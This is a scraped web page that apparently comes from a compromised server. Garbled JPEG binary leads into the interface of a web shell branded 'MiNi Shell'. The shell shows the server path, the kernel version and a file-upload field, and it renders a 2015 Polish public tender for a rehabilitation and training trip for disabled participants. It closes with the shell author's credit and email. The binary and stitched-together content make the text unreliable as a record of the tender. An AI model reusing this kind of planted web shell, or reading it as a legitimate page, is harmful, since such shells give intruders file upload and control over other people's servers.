JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150413/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150413/50813-N-2015.html

<p class="kh_header"><b>Zwoleń: Zorganizowanie i przeprowadzenie szkolenia wyjazdowego dla  uczestników   projektu systemowego My samodzielni   realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Zwoleniu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego
Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 50813 - 2015; data zamieszczenia: 13.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Zwoleniu , ul. Wojska Polskiego 78, 26-700 Zwoleń, woj. mazowieckie, tel. 48 676 3623, faks 48 676 36 23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcprzwolen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia wyjazdowego dla  uczestników   projektu systemowego My samodzielni   realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Zwoleniu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego
Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 Przedmiotem zamówienia jest: Zorganizowanie i przeprowadzenie 14 dniowego szkolenia wyjazdowego z zakresu aktywności zawodowej i społecznej wraz z programem  rehabilitacyjno - integracyjnym dla grupy 37 osobowej w tym: 25 osób niepełnosprawnych i 10 ich opiekunów oraz 2  opiekunów grupy  ze strony Zamawiającego, będących  uczestnikami projektu systemowego My samodzielni realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Zwoleniu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie 
2.Osoby niepełnosprawne biorące udział w wyjeździe, posiadają następujące dysfunkcje wiodące:
- upośledzenie narządu ruchu ( wśród uczestników wyjazdu będą osoby poruszające się na wózkach inwalidzkich i kulach),
- choroby psychiczne,
- choroby neurologiczne,
- choroby układu oddechowego i krążenia,
3. Wykonawca zobowiązany jest zrealizować przedmiot zamówienia zgodnie z ustawą z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnieniu osób niepełnosprawnych ( Dz. U. z 2011 r. Nr 127, poz. 721 ze zm.) oraz rozporządzeniem Ministra Pracy i Polityki Społecznej w sprawie turnusów rehabilitacyjnych z dnia 15 listopada 2007 r. ( Dz. U. z 2007 r. Nr 230, poz. 1694 ze zm.) a w  szczególności  zapewnić jego uczestnikom:
3.1  W zakresie położenia ośrodka odnośnie  wszystkich wyjazdów:
a) zakwaterowania w jednym obiekcie sanatoryjnym lub wypoczynkowym ( dla całej grupy) uprawnionym do realizacji niniejszego zamówienia, zlokalizowanym w odległości max. 300 km od siedziby Zamawiającego ( Zwolenia) ,Zamawiający określił lokalizację ośrodka maksymalnie 300 km od siedziby Zamawiającego biorąc pod uwagę bezpieczeństwo oraz komfort osób niepełnosprawnych biorących udział w niniejszym wyjeździe szkoleniowym z uwagi na to, że są to  osoby niepełnosprawne z różnymi schorzeniami również  poruszające się na wózkach inwalidzkich.
b) wszystkie pomieszczenia ogólnodostępne, z których korzystać będą uczestnicy m.in. stołówka, baza rekreacyjna, baza zabiegowa itp,  powinny być dostosowane do potrzeb osób poruszających się na wózkach inwalidzkich ( np. winda, podjazd itp.)

3.2 W zakresie zakwaterowania:
a) rozlokowania wszystkich uczestników w pokojach 2 lub 3 osobowych  z pełnym węzłem sanitarnym ( tj: umywalka, prysznic, wc, z całodobowym dostępem do ciepłej i zimnej wody) zlokalizowanych na parterze ośrodka, wyposażonych w telewizor z pilotem, telefon, czajnik bezprzewodowy, ręczniki kąpielowe itp.
b) w przypadku zakwaterowania na piętrze niezbędne wyposażenie budynku w windę. Wykonawca musi dysponować również salą szkoleniową do przeprowadzenia zajęć z zakresu rozwoju aktywności zawodowej i społecznej.
c) wyposażenie pokoi i łazienek w rozwiązania architektoniczne dostosowane do rodzaju niepełnosprawności (np. osób poruszających się na wózkach inwalidzkich)
d)zapewnienie obsługi sprzątającej dla utrzymania czystości w pokojach i węzłach sanitarnych oraz innych pomieszczeniach, z których będą korzystać uczestnicy wyjazdu.
Przed podpisaniem umowy z Wykonawcą Zamawiający zastrzega sobie przeprowadzenie oględzin zaoferowanego ośrodka w którym zostanie zrealizowane niniejsze zamówienie.
3.3 W zakresie wyżywienia:
a)  3 posiłki dziennie ( śniadanie, obiad dwudaniowy z deserem i kompotem, kolacja) w stołówce położonej na  terenie ośrodka, z zastrzeżeniem iż przyjazd uczestników do ośrodka rozpoczyna się obiadem.
b) w przypadku osób wymagających zastosowania specjalistycznej diety, zagwarantowanie zbilansowanych, urozmaiconych posiłków, dostosowanych do rodzaju schorzenia;
c) suchy prowiant na czas podróży w dniu wyjazdu i  powrotu; 
d) żywienie uczestników pobytu powinno odbywać się zgodnie z zasadami racjonalnego żywienia i zasad higieny;
3.4 W zakresie bazy rehabilitacyjno - zabiegowej:
a)  co najmniej 2 zabiegi dziennie przez min. 10 dni zabiegowych dla każdej osoby  niepełnosprawnej, według wskazań lekarza, dostosowane do rodzaju schorzenia lub dysfunkcji, zabiegi realizowane na terenie ośrodka w którym zakwaterowani będą  uczestnicy wyjazdu;
b) wykwalifikowana kadra rehabilitantów i fizykoterapeutów;
c) badania  lekarskie na początku i na końcu  turnusu osób niepełnosprawnych;
d) całodobowa opieka pielęgniarska i lekarska ( lekarz i pielęgniarka na stałe przebywający w ośrodku)
e) w przypadku konieczności przewozu uczestnika do szpitala, gwarancja bezpłatnego transportu, opieki pielęgniarskiej lub lekarskiej;
3.5 W zakresie zaplecza rekreacyjno - rozrywkowego:
a) kadra gwarantująca prawidłową realizację programu wyjazdu, w tym opiekunowie  odpowiedzialni za koordynację pobytu grupy w zakresie obsługi kulturalno- oświatowej;
b) bogata oferta zajęć integracyjno - rozrywkowych ( ogniska, grillowanie, zabawy taneczne, wieczorki integracyjne wraz z poczęstunkiem odpowiednim do typu imprez);
c) zorganizowanie 2-ch wycieczek autokarowych krajoznawczych w tym:uregulowanie wszelkich biletów wstępu, wejściówek opłat parkingowych itp;
d) bogata bezpłatna infrastruktura sportowa np.: boiska do piłki siatkowej, koszykowej, wypożyczalnia sprzętu sportowego, wypożyczalnia rowerów, itp.;
e) zajęcia związane z przedmiotem zamówienia z uwzględnieniem rodzaju niepełnosprawności osób biorących w nich udział;
3.6 W zakresie transportu:
a) przewóz uczestników ze Zwolenia do miejscowości w której położony jest ośrodek, oraz przywóz z ośrodka do Zwolenia po zakończeniu pobytu;
b) wykonawca zapewni sprawny  technicznie ( posiadający aktualny przegląd techniczny), komfortowo wyposażony autokar z klimatyzacją, toaletą, TV i nagłośnieniem;
c) wykonawca zapewni kierowcę posiadającego odpowiednie uprawnienia do prowadzenia pojazdu i aktualne badania lekarskie;
d) wykonawca poinformuje zamawiającego o terminie, miejscu i godzinie podstawienia autokaru w dniu wyjazdu ze Zwolenia w formie pisemnej najpóźniej na 5 dni przed planowanym terminem wyjazdu;
e) ubezpieczenia  NNW wszystkich uczestników na czas pobytu i przejazdu autokarowego w wysokości 10 tys. zł. przypadających na jednego uczestnika a w razie zaistnienia potrzeby sporządzenia protokołu okoliczności i przyczyn wypadku związanego z uczestnikiem jak i w drodze do i z  miejsca wyjazdu;
f) wykonawca jest zobowiązany do zapewnienia  opiekuna grupy podczas wyjazdu i wspierania osób przez cały okres pobytu;
3.7 W zakresie przeprowadzenia szkolenia:
a) wykonawca przeprowadzi 40  godz. grupowego szkolenie z zakresu rozwoju aktywności zawodowej i społecznej oraz po 1 godz. indywidualnego doradztwa zawodowego dla każdej osoby niepełnosprawnej) z doradcą zawodowym.
b) tematyka szkolenia obejmuje:
- umiejętności komunikacji interpersonalnej;
- jak podnieść poczucie własnej wartości:
- jak wzmocnić pewność siebie;
- nabycie umiejętności radzenia sobie ze stresem;
- poruszanie się po rynku pracy;
- warunki zatrudnienia osób niepełnosprawnych oraz przysługujące im prawa i obowiązki;
- nauka konstruowania CV oraz listu motywacyjnego;
- nabywanie wiedzy z zakresu autoprezentacji;
c) Wykonawca na 5 dni przed planowanym wyjazdem przedstawi zamawiającemu, plan wyjazdu oraz program szkolenia.
d)uczestnikom należy zapewnić niezbędne materiały szkoleniowe ( długopis, materiały dydaktyczne z zakresu i tematyki  objętej programem szkolenia, notatnik), które zostaną przekazane uczestnikom na własność i należy je wliczyć w cenę szkolenia.
e) Wykonawca zobowiązany jest do udokumentowania przebiegu szkolenia, wymiaru godzin , potwierdzonego przez trenera,
f) w trakcie szkolenia poczęstunek w postaci suszu ciastkowego, napoi, owoców, kawy, herbaty.
3.8 Wymagania dodatkowe, związane z realizacją usługi:
a) opłata taksy klimatycznej za wszystkich uczestników, jeżeli wymagać będzie tego lokalizacja ośrodka miejscowości uzdrowiskowej;
b) oznakowania miejsc, z których korzystać będą uczestnicy projektu, poprzez umieszczenie plakatów informacyjnych dotyczących realizowanego projektu;
c) prowadzenie dokumentacji zdjęciowej i przekazania jej w formie zapisu cyfrowego na płycie CD Zamawiającemu po zakończeniu  zrealizowanej usługi;
d) zawiadomienie zamawiającego o każdym przypadku przerwania pobytu przez jego uczestnika;
e) przekazanie sprawozdania  w formie pisemnej  po jej zakończeniu   zawierającego opis przeprowadzonej usługi oraz innych dokumentów wymaganych  przez Zamawiającego, niezbędnych przy realizacji ww. projektu w tym:
- sprawozdania z przeprowadzonej usługi;
- dokumentacji fotograficznej;
- harmonogramu zajęć, wykazu kadry;
- listy uczestników;
- listy potwierdzającej odbiór materiałów szkoleniowych;
- listy potwierdzającej odbiór zaświadczeń, oraz kserokopie tych zaświadczeń 9 potwierdzonych za zgodność z oryginałem)
- listy potwierdzającej udziału uczestników w programach integracyjnych;
- listy potwierdzającej udział uczestników na zajęciach grupowych;
- listy potwierdzającej udział uczestników na zajęciach indywidualnych;
- potwierdzenie badań lekarskich;
- potwierdzenie udziału uczestników na zajęciach rehabilitacyjnych;
- ankiety ,wypełnione przez uczestników po zakończeniu szkolenia;
f)  podane w pkt 1 niniejszego załącznika ilości uczestników są szacunkowe a Zamawiający poda wstępną ilość osób na 5 dni przed rozpoczęciem realizacji usługi. Powiadomienie o wstępnej ilości uczestników nastąpi faksem lub pocztą elektroniczną na numer/adres podany przez Wykonawcę w ofercie.  Zamawiający zastrzega, że liczba uczestników i opiekunów może ulec zmianie (zwiększeniu lub zmniejszeniu) i tak:
-  jeżeli zamawiający zgłosi zmniejszenie ilości uczestników, najpóźniej w dniu wyjazdu , to  nie poniesie kosztów umownych świadczeń przewidzianych dla tych uczestników, których nieobecność została zgłoszona;
- jeżeli zamawiający nie dokona zgłoszenia o zmniejszeniu ilości uczestników, zapłaci umowną cenę świadczeń przewidzianych dla danej osoby za wszystkie dni trwania usługi;
- jeżeli liczba osób zostanie zwiększona Zamawiający, dodatkowo pokryje koszty tych osób zgodnie z e złożoną w niniejszym postępowaniu ofertą.
-  Każdorazowa zmiana ilości osób uczestników projektu wymagać będzie formy pisemnej w postaci aneksu do umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.25.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w prowadzonym postępowaniu nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca zobowiązany jest wykazać, że posiada aktualny na dzień składania ofert i trwania turnusu wpis do rejestru organizatorów turnusów rehabilitacyjnych o którym mowa w rozporządzeniu Ministra Polityki Społecznej z dnia 15 listopada 2007 roku w sprawie turnusów rehabilitacyjnych ( Dz. U. z 2007 r.   Nr 230, poz. 1694).  Aktualny na dzień składania ofert i trwania turnusu wpis do rejestru ośrodków o którym mowa w rozporządzeniu Ministra Polityki Społecznej z dnia 15 listopada 2007 roku w sprawie turnusów rehabilitacyjnych ( Dz.U. z 2007 r. Nr 230 poz. 1694) Ocena spełnienia tego warunku będzie dokonana w oparciu o kompletność i prawidłowość złożonych wraz z ofertą dokumentów, jakich żąda Zamawiający i zostanie dokonana na podstawie treści tych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie tego warunku Zamawiający wymaga wykazania przez Wykonawcę,  wykonanych a w przypadku świadczeń okresowych lub  ciągłych również wykonywanych, usług w zakresie niezbędnym do spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem   terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie poprzez wykazanie co najmniej 2 usług  polegających na przeprowadzeniu 14 dniowego szkolenia wyjazdowego z programem rehabilitacyjno- integracyjnym z udziałem osób niepełnosprawnych dla grupy minimum 30 osobowej o wartości nie mniejszej niż 50 000,00 zł. brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy - według wzoru stanowiącego załącznik Nr 2 do SIWZ.
2.  Oświadczenie Wykonawcy o spełnieniu warunków określonych w art.22 ust.1 pkt 1-4 ustawy Pzp - według wzoru stanowiącego załącznik Nr 3 do SIWZ.
3. Informację o częściach zamówienia, których realizacja powierzona zostanie określonemu Podwykonawcy- według wzoru stanowiącego załącznik Nr 6 do SIWZ.
4.Parafowany przez Wykonawcę projekt umowy - stanowiący Zał. Nr 7 do SIWZ.
5. Pełnomocnictwo do reprezentowania, o ile ofertę składa pełnomocnik.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - doświadczenie Wykonawcy w prowadzeniu szkoleń wyjazdowych wraz z programem rehabilitacyjno - integracyjnym dla osób niepełnosprawnych - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty w przypadku, gdy konieczność ich wprowadzenia wyniknie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, zaś zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane przez Wykonawcę. Zmiany dotyczyć mogą okoliczności wynikających z przyczyn technicznych, gospodarczych, finansowych, organizacyjnych, jeżeli będzie to konieczne dla uzyskania celu określonego w postanowieniach umowy zawartej z Wykonawcą.
2. Niezależnie od okoliczności wymienionych w pkt 1 Zamawiający ma prawo do zmian umowy dotyczących w szczególności:
1) gdy z powodu okoliczności niezależnych od Zamawiającego lub Wykonawcy konieczna będzie zmiana  terminu realizacji zamówienia, Zamawiający na wniosek Wykonawcy może  zmienić termin realizacji zamówienia;
2) zmiana ilości uczestników wyjazdu;
3.Zmiany postanowień zawartej umowy wymagają dla swej ważności formy pisemnej w postaci aneksu podpisanego przez obie strony a wniosek o wprowadzenie powyższych zmian musi być złożony na piśmie i uzasadniony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprzwolen.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Zwoleniu, ul. Wojska Polskiego 78, 26-700 Zwoleń, pok. Nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2015 godzina 11:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Zwoleniu, ul. Wojska Polskiego 78, 26-700 Zwoleń, pok. Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com